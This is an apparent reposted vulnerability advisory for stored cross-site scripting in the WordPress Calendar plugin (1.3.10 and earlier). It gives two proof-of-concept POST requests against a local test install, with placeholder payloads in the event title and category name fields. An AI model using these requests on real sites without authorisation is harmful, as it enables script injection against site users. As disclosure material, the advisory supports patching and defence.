Calendar <= 1.3.10 – Authenticated Stored Cross-Site Scripting (XSS)

Nov 5, 2018 | Security - Internet, WordPress, and otherwise




calendar Calendar <= 1.3.10 – Authenticated Stored Cross-Site Scripting (XSS)
Proof of Concept
POC 1#

You can inject JavaScript code into the event title when creating it:

POST /wordpress/wp-admin/admin.php?page=calendar HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=calendar&action=delete&event_id=3&_wpnonce=cc7cb5ade4
Content-Type: application/x-www-form-urlencoded
Content-Length: 375
Connection: close

action=add&event_id=&_wpnonce=4c75b15fa6&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar%26action%3Ddelete%26event_id%3D3%26_wpnonce%3Dcc7cb5ade4&event_title=%[XSS]&event_desc=test&event_category=1&event_link=&event_begin=2018-10-30&event_end=2018-10-30&event_time=21%3A24&event_repeats=0&event_recur=S&save=Save+%C2%BB


POC 2#
You can inject JavaScript code into the category name when creating it:

POST /wordpress/wp-admin/admin.php?page=calendar-categories HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close

mode=add&category_id=&_wpnonce=fc2e4e9618&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar-categories&category_name=[XSS È&category_colour=&save=Save+%C2%BB
eHost managed wordpress hosting

We’re listening.

Have something to say about this article? Share it with us on Facebook, Twitter or LinkedIn:

SHARE IT HERE:

Subscribe ToThe Weekly SEO Trade News Updates

Get the latest SEO, SEM and SMM marketing intel, tips and tricks from one of the best SEO Gurus online. 

Every Tuesday morning we send out an aggregated email listing all new posts on SEO Trade News.

Excellent! Now check your email to confirm your subscription.